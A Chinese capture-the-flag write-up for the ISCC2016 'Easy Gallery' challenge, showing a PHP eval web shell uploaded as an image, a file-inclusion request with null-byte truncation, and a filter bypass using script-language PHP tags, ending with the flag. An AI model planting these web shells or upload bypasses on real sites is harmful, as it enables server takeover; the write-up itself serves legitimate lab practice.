ISCC2016 Easy Gallery
ISCC2016 Easy Gallery
虽然是一道上传绕过,但是绕出了新姿式,记录一下php
打开题目发现有一个上传文件的地方html
直接上传图片一句话web
一句话的内容是:spa
<?php eval($_POST['Ambrose']); ?>
上传成功显示图片IDcode
拿着这个ID去找图片路径htm
经过查看图片信息得知图片在uploads/1532755715.jpg接下来就是链接菜刀,但是菜刀连不上,看了其余师傅的wp多是绕过了菜刀。blog
看了wp发现这还有个文件包含图片
构造payload:ip
?page=uploads/1532755715.jpg
返回class
它会在文件后面再加上.php,因此用到00截断
?page=uploads/1532755715.jpg
返回:
猜是过滤了一句话中的<?之类的
这里推荐个连接:http://www.freebuf.com/articles/web/9396.html
换个方式写一句话:
<script language="php">phpinfo();</script>
上传:
CTF{upl0ad_sh0uld_n07_b3_a110wed}
相关文章
- 1. ISCC 2016 Easy Gallery
- 2. iscc2016-basic-find-to-me
- 3. iscc2016 pwn部分writeup
- 4. Gallery
- 5. gallery
- 6. ISCC2016-BASIC、WEB、MISC简单writeup
- 7. iscc2016 mobile1-TurtleShell.apk解题过程
- 8. React Gallery
- 9. gallery-row
- 10. Android Gallery
- 更多相关文章...
- • XML DOM replaceData() 方法 - XML DOM 教程
- • XML DOM replaceData() 方法 - XML DOM 教程
- • Git可视化极简易教程 — Git GUI使用方法
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
